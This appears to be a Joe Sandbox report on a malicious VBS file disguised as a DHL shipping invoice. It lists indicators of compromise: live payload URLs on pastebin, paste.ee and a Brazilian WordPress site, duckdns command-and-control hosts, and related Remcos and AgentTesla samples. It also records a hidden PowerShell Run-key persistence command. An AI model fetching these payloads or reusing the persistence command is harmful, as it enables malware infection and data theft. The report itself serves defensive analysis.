                      https://pastebin.com/raw/pQQ0n3eA5%VirustotalBrowse
                      https://www.google.com0%VirustotalBrowse
                      https://analytics.paste.ee1%VirustotalBrowse
                      https://paste.ee1%VirustotalBrowse
                      https://www.google.com/accounts/servicelogin0%VirustotalBrowse
                      https://cdnjs.cloudflare.com0%VirustotalBrowse
                      http://sbelegi.com.br/wp-content/plugins/cognac/smsinc.txt1%VirustotalBrowse
                      http://www.nirsoft.net/0%VirustotalBrowse
                      https://secure.gravatar.com0%VirustotalBrowse
                      https://themes.googleusercontent.com0%VirustotalBrowse
                      https://pastebin.com0%VirustotalBrowse
                      NameIPActiveMaliciousAntivirus DetectionReputation
                      paste.ee
                      188.114.97.3
                      truetrueunknown
                      geoplugin.net
                      178.237.33.50
                      truefalseunknown
                      janbours92harbu04.duckdns.org
                      172.111.213.72
                      truetrueunknown
                      desckvbrat.com.br
                      191.252.83.213
                      truetrueunknown
                      sbelegi.com.br
                      128.201.75.197
                      truetrueunknown
                      pastebin.com
                      104.20.3.235
                      truetrueunknown
                      janbours92harbu03.duckdns.org
                      unknown
                      unknowntrueunknown
                      ftp.desckvbrat.com.br
                      unknown
                      unknowntrueunknown
                      NameMaliciousAntivirus DetectionReputation
                      https://paste.ee/d/qYZ64/0true
                        unknown
                        janbours92harbu03.duckdns.orgtrueunknown
                        https://pastebin.com/raw/pQQ0n3eAfalseunknown
                        https://paste.ee/d/oWGnC/0true
                          unknown
                          http://geoplugin.net/json.gpfalse
                          • URL Reputation: safe
                          unknown
                          http://sbelegi.com.br/wp-content/plugins/cognac/smsinc.txttrueunknown
                          https://paste.ee/d/2A2GE/0true
                            unknown
                            NameSourceMaliciousAntivirus DetectionReputation
                            http://nuget.org/NuGet.exepowershell.exe, 00000004.00000002.2537350188.0000012FD4FC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC6A5E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2802400106.0000015045F81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2830818460.0000024FC49B2000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.imvu.comrAddInProcess32.exe, 00000018.00000002.2392226632.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000006.00000002.2304620541.0000024FB4B62000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://paste.eepowershell.exe, 00000004.00000002.2292021482.0000012FC5559000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC69EC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC66A9000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                            http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000005.00000002.2300798084.0000015036132000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2304620541.0000024FB4B62000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000006.00000002.2304620541.0000024FB4B62000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                            http://ftp.desckvbrat.com.brpowershell.exe, 00000004.00000002.2292021482.0000012FC5F83000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC5531000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                            https://go.micropowershell.exe, 00000004.00000002.2292021482.0000012FC5F83000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://desckvbrat.com.brpowershell.exe, 00000004.00000002.2292021482.0000012FC5F83000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC5531000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                            http://sbelegi.com.brpowershell.exe, 00000004.00000002.2292021482.0000012FC550A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC5506000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                            https://contoso.com/Licensepowershell.exe, 00000006.00000002.2830818460.0000024FC49B2000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://www.google.com;powershell.exe, 00000004.00000002.2292021482.0000012FC54E4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC5341000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC6A31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC54A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC66A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC66D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC535F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC555F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC54E0000.00000004.00000800.00020000.00000000.sdmpfalse
                              unknown
                              http://www.imvu.comAddInProcess32.exe, AddInProcess32.exe, 00000018.00000002.2392226632.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              https://contoso.com/Iconpowershell.exe, 00000006.00000002.2830818460.0000024FC49B2000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://sbelegi.com.br/wp-content/plugins/cognac/H#powershell.exe, 00000004.00000002.2292021482.0000012FC5506000.00000004.00000800.00020000.00000000.sdmpfalse
                                unknown
                                https://analytics.paste.eepowershell.exe, 00000004.00000002.2292021482.0000012FC54E4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC5341000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC6A31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC54A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC66A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC66D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC535F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC555F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC54E0000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                                https://paste.eepowershell.exe, 00000004.00000002.2292021482.0000012FC667D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC69D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC535F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC5172000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                                https://paste.ee/d/2A2GE/0Ppowershell.exe, 00000004.00000002.2292021482.0000012FC667D000.00000004.00000800.00020000.00000000.sdmpfalse
                                  unknown
                                  https://aka.ms/pscore6powershell.exe, 00000002.00000002.2917323409.0000021E23C0F000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://github.com/Pester/Pesterpowershell.exe, 00000006.00000002.2304620541.0000024FB4B62000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                                  http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.comAddInProcess32.exe, 00000018.00000002.2392226632.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                    unknown
                                    https://www.google.compowershell.exe, 00000004.00000002.2292021482.0000012FC54E4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC5341000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC6A31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC54A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC66A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC66D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC535F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC555F000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, AddInProcess32.exe, 00000018.00000002.2392226632.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalseunknown
                                    http://geoplugin.net/json.gp/Cpowershell.exe, 0000000D.00000002.2474230885.000001C41E49E000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000005.00000002.2300798084.0000015036132000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2304620541.0000024FB4B62000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    https://contoso.com/powershell.exe, 00000006.00000002.2830818460.0000024FC49B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    https://nuget.org/nuget.exepowershell.exe, 00000004.00000002.2537350188.0000012FD4FC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC6A5E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2802400106.0000015045F81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2830818460.0000024FC49B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    https://analytics.paste.ee;powershell.exe, 00000004.00000002.2292021482.0000012FC54E4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC5341000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC6A31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC54A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC66A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC66D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC535F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC555F000.00000004.00000800.00020000.00000000.sdmpfalse
                                      unknown
                                      https://www.google.com/accounts/serviceloginAddInProcess32.exefalseunknown
                                      https://login.yahoo.com/config/loginAddInProcess32.exefalse
                                      • URL Reputation: safe
                                      unknown
                                      https://paste.ee/d/oWGnC/0Ppowershell.exe, 00000004.00000002.2292021482.0000012FC69D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                        unknown
                                        https://cdnjs.cloudflare.compowershell.exe, 00000004.00000002.2292021482.0000012FC54E4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC5341000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC6A31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC54A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC66A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC66D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC535F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC555F000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                                        https://aka.ms/pscore68powershell.exe, 00000002.00000002.2917323409.0000021E23C60000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC4F51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2300798084.0000015035F11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2304620541.0000024FB4941000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2238540317.00000260B1BA7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2238540317.00000260B1BBD000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        https://cdnjs.cloudflare.com;powershell.exe, 00000004.00000002.2292021482.0000012FC54E4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC5341000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC6A31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC54A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC66A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC66D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC535F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC555F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC54E0000.00000004.00000800.00020000.00000000.sdmpfalse
                                          unknown
                                          http://www.nirsoft.net/AddInProcess32.exe, 00000018.00000002.2392226632.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalseunknown
                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.2917323409.0000021E23C8F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC4F51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2300798084.0000015035F11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2304620541.0000024FB4941000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2238540317.00000260B1B7A000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://crl.vpowershell.exe, 00000006.00000002.2940383088.0000024FCCD37000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          https://pastebin.compowershell.exe, 0000000D.00000002.2326336524.000001C40E6B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2326336524.000001C40E4A0000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                                          https://secure.gravatar.compowershell.exe, 00000004.00000002.2292021482.0000012FC54E4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC5341000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC6A31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC54A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC66A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC66D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC535F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC555F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC54E0000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                                          https://themes.googleusercontent.compowershell.exe, 00000004.00000002.2292021482.0000012FC54E4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC5341000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC6A31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC54A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC66A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC66D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC535F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC555F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC54E0000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                                          http://www.ebuddy.comAddInProcess32.exe, AddInProcess32.exe, 00000018.00000002.2392226632.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          • No. of IPs < 25%
                                          • 25% < No. of IPs < 50%
                                          • 50% < No. of IPs < 75%
                                          • 75% < No. of IPs
                                          IPDomainCountryFlagASNASN NameMalicious
                                          104.20.3.235
                                          pastebin.comUnited States
                                          13335CLOUDFLARENETUStrue
                                          188.114.97.3
                                          paste.eeEuropean Union
                                          13335CLOUDFLARENETUStrue
                                          172.111.213.72
                                          janbours92harbu04.duckdns.orgUnited States
                                          1421WANSECURITYUStrue
                                          178.237.33.50
                                          geoplugin.netNetherlands
                                          8455ATOM86-ASATOM86NLfalse
                                          191.252.83.213
                                          desckvbrat.com.brBrazil
                                          27715LocawebServicosdeInternetSABRtrue
                                          128.201.75.197
                                          sbelegi.com.brBrazil
                                          266618MEGAPROVEDOR-SERVICOSDEINTERNETLTDA-MEBRtrue
                                          Joe Sandbox version:41.0.0 Charoite
                                          Analysis ID:1533046
                                          Start date and time:2024-10-14 11:09:17 +02:00
                                          Joe Sandbox product:CloudBasic
                                          Overall analysis duration:0h 9m 43s
                                          Hypervisor based Inspection enabled:false
                                          Report type:full
                                          Cookbook file name:default.jbs
                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                          Number of analysed new started processes analysed:31
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:0
                                          Technologies:
                                          • HCA enabled
                                          • EGA enabled
                                          • AMSI enabled
                                          Analysis Mode:default
                                          Analysis stop reason:Timeout
                                          Sample name:DHL_Shipping_Invoices_Awb_0000000.vbs
                                          Detection:MAL
                                          Classification:mal100.rans.spre.phis.troj.spyw.expl.evad.winVBS@43/34@9/6
                                          EGA Information:
                                          • Successful, ratio: 58.3%
                                          HCA Information:
                                          • Successful, ratio: 98%
                                          • Number of executed functions: 159
                                          • Number of non-executed functions: 294
                                          Cookbook Comments:
                                          • Found application associated with file extension: .vbs
                                          • Exclude process from analysis (whitelisted): dllhost.exe, consent.exe, WMIADAP.exe, SIHClient.exe
                                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                          • Execution Graph export aborted for target powershell.exe, PID 1276 because it is empty
                                          • Execution Graph export aborted for target powershell.exe, PID 1436 because it is empty
                                          • Execution Graph export aborted for target powershell.exe, PID 2804 because it is empty
                                          • Execution Graph export aborted for target powershell.exe, PID 5236 because it is empty
                                          • Execution Graph export aborted for target powershell.exe, PID 5836 because it is empty
                                          • Not all processes where analyzed, report is missing behavior information
                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                          • Report size getting too big, too many NtCreateKey calls found.
                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                                          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                          TimeTypeDescription
                                          05:10:12API Interceptor217x Sleep call for process: powershell.exe modified
                                          05:11:08API Interceptor1231161x Sleep call for process: AddInProcess32.exe modified
                                          11:10:28AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Update Drivers NVIDEO_ppc cmd.exe /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\uxrsw.ps1' ";exit
                                          11:10:37AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Update Drivers NVIDEO_ppc cmd.exe /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\uxrsw.ps1' ";exit
                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          104.20.3.235sostener.vbsGet hashmaliciousNjratBrowse
                                          • pastebin.com/raw/V9y5Q5vv
                                          SX8OLQP63C.exeGet hashmaliciousVjW0rm, AsyncRAT, RATDispenserBrowse
                                          • pastebin.com/raw/V9y5Q5vv
                                          sostener.vbsGet hashmaliciousRemcosBrowse
                                          • pastebin.com/raw/V9y5Q5vv
                                          New Voicemail Invoice 64746w .jsGet hashmaliciousWSHRATBrowse
                                          • pastebin.com/raw/NsQ5qTHr
                                          Invoice-883973938.jsGet hashmaliciousWSHRATBrowse
                                          • pastebin.com/raw/NsQ5qTHr
                                          2024 12_59_31 a.m..jsGet hashmaliciousWSHRATBrowse
                                          • pastebin.com/raw/NsQ5qTHr
                                          PendingInvoiceBankDetails.JS.jsGet hashmaliciousWSHRATBrowse
                                          • pastebin.com/raw/NsQ5qTHr
                                          188.114.97.3AeYgxx6XFk.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                          • kitaygorod.top/EternalProcessorMultiwordpressdleTempcentraltemporary.php
                                          http://host.cloudsonicwave.comGet hashmaliciousUnknownBrowse
                                          • host.cloudsonicwave.com/favicon.ico
                                          alWUxZvrvU.exeGet hashmaliciousFormBookBrowse
                                          • www.avantfize.shop/q8x9/
                                          foljNJ4bug.exeGet hashmaliciousFormBookBrowse
                                          • www.bayarcepat19.click/fxts/
                                          RRjzYVukzs.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                          • 863811cm.nyafka.top/video_RequestpacketUpdategeneratorPublic.php
                                          octux.exe.exeGet hashmaliciousUnknownBrowse
                                          • servicetelemetryserver.shop/api/index.php
                                          1728514626a90de45f2defd8a33b94cf7c156a8c78d461f4790dbeeed40e1c4ac3b9785dda970.dat-decoded.exeGet hashmaliciousFormBookBrowse
                                          • www.jandjacres.net/gwdv/?arl=VZkvqQQ3p3ESUHu9QJxv1S9CpeLWgctjzmXLTk8+PgyOEzxKpyaH9RYCK7AmxPqHPjbm&Ph=_ZX8XrK
                                          BILL OF LADDING.exeGet hashmaliciousFormBookBrowse
                                          • www.launchdreamidea.xyz/bd77/
                                          http://embittermentdc.comGet hashmaliciousUnknownBrowse
                                          • embittermentdc.com/favicon.ico
                                          scan_374783.jsGet hashmaliciousAgentTeslaBrowse
                                          • paste.ee/d/gvOd3
                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          janbours92harbu04.duckdns.orgawb_shipping_doc_001700720242247820020031808174CN18003170072024_00000000pdf.jsGet hashmaliciousRemcosBrowse
                                          • 172.111.244.102
                                          Quotation request YN2024-10-07pdf.vbsGet hashmaliciousRemcosBrowse
                                          • 172.111.244.103
                                          Quotation request YN2024-10-07pdf.vbsGet hashmaliciousRemcosBrowse
                                          • 172.111.244.100
                                          Urgent Purchase Order (P.O.) No.477764107102024.vbsGet hashmaliciousRemcosBrowse
                                          • 172.111.244.100
                                          zR4aIjCuRs.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                          • 45.74.58.7
                                          Enclosed_PO4376630092024_Request_Specifications_Drawings_jpg.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                          • 172.111.244.105
                                          Awb_Shipping_Invoice_docs_001700720242247820020031808174CN18003170072024.bat.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                          • 172.111.137.133
                                          file.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                          • 172.111.213.87
                                          New_Order-Rquest_Quotation_Specifications_Drawings_Samplespdf.bat.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                          • 172.111.244.109
                                          PO-2609202412666 PNG2023-W101_pdf.bat.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                          • 172.111.244.109
                                          paste.ee20062024150836 11.10.2024.vbeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                          • 188.114.97.3
                                          awb_shipping_doc_001700720242247820020031808174CN18003170072024_00000000pdf.jsGet hashmaliciousRemcosBrowse
                                          • 188.114.97.3
                                          DIEN OMM 10.10.2024.vbeGet hashmaliciousUnknownBrowse
                                          • 188.114.97.3
                                          10092024150836 09.10.2024.vbeGet hashmaliciousFormBookBrowse
                                          • 188.114.96.3
                                          Logistics1.vbsGet hashmaliciousFormBookBrowse
                                          • 188.114.96.3
                                          SWIFT 103 202410071251443120 071024-pdf.vbsGet hashmaliciousRemcosBrowse
                                          • 188.114.97.3
                                          Quotation request YN2024-10-07pdf.vbsGet hashmaliciousRemcosBrowse
                                          • 188.114.96.3
                                          E_receipt.vbsGet hashmaliciousUnknownBrowse
                                          • 188.114.96.3
                                          SWIFT 103 202410071519130850 071024.pdf.vbsGet hashmaliciousRemcosBrowse
                                          • 188.114.97.3
                                          scan_374783.jsGet hashmaliciousAgentTeslaBrowse
                                          • 188.114.97.3
                                          geoplugin.net037002451082_10142024.xlsGet hashmaliciousRemcosBrowse
                                          • 178.237.33.50
                                          Custom Export Tax Recovery Form.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                          • 178.237.33.50
                                          Salary Increase Letter_Oct 2024.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                          • 178.237.33.50
                                          WC5Gv13cOQ.rtfGet hashmaliciousRemcosBrowse
                                          • 178.237.33.50
                                          BeeaCHpaO4.exeGet hashmaliciousRemcosBrowse
                                          • 178.237.33.50
                                          na.rtfGet hashmaliciousRemcosBrowse
                                          • 178.237.33.50
                                          PO-00006799868.xlsGet hashmaliciousRemcosBrowse
                                          • 178.237.33.50
                                          STATEMENT - PAYMENT TRACKING Sept 2024.docx.docGet hashmaliciousRemcosBrowse
                                          • 178.237.33.50
                                          narud#U017ebenica TISAKOMERC d.o.oRadbrkkedes234525262623.wsfGet hashmaliciousRemcos, GuLoaderBrowse
                                          • 178.237.33.50
                                          awb_shipping_doc_001700720242247820020031808174CN18003170072024_00000000pdf.jsGet hashmaliciousRemcosBrowse
                                          • 178.237.33.50
                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          CLOUDFLARENETUSEQORY0083009.vbsGet hashmaliciousAgentTeslaBrowse
                                          • 104.26.13.205
                                          https://hy.markkasmick.click/cx/tbSgVco_akr35UznLBgMmL_dGwr4A9B_vyg2WwEB0w1LRjKjQMyEnB89mCfTRy8oqnbpdFunqinBhx0TsHvSJdUHnbksc3kdcKecoDvVHa5LAm46at*Mm*Ro3D2CHoEu2bmOqt4Ic8O_7AE7Igwgbi5c8zmZf6Fqp*_XqcjREPr7609oL7vKm8FfjGLhMetr2oxtpR3ywH4BUElgc7EI7usxj8CJYEUMktwlb7YUzPvYQ7P1PilEV0LqiXI5sm6QVF4ZGl5TIXhnQLOG0kl6WQ0miiZysBfhaNojnPTUvisUUkwOp2fYTxkXEIhZ7ESJ7qXYLxQbm*y4RJVeZZZ3RY5rX8W5t8cudSM9Zx7UaxgLH56aOv81v4QfUnzroT9v*7LR3jPEjz*YXr2LwuykYQnzvV6boWl*o*gU4jkPE6MocRRlRoC6uUx2e1Wseo8MqGWTT2uXo4HbQDneiMF84sQ34*3TnbAxXWu8xLbb_mAOQxUTA3T5TUUZKeU3ziolM8TSVV5Y5LQTFGtNArddwJKdWCb_cLYMxUJpZ3cqM_AGet hashmaliciousUnknownBrowse
                                          • 104.16.160.168
                                          Custom Export Tax Recovery Form.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                          • 172.67.128.117
                                          Salary Increase Letter_Oct 2024.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                          • 172.67.128.117
                                          TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                                          • 188.114.97.3
                                          https://emojiparqueacuaticoo.site/NClMD/Get hashmaliciousHTMLPhisherBrowse
                                          • 104.17.25.14
                                          file.exeGet hashmaliciousLummaCBrowse
                                          • 104.21.53.8
                                          http://puzzlewood.netGet hashmaliciousUnknownBrowse
                                          • 104.26.7.189
                                          http://www.umb-re.comGet hashmaliciousUnknownBrowse
                                          • 1.1.1.1
                                          na.elfGet hashmaliciousMirai, OkiruBrowse
                                          • 104.23.26.35
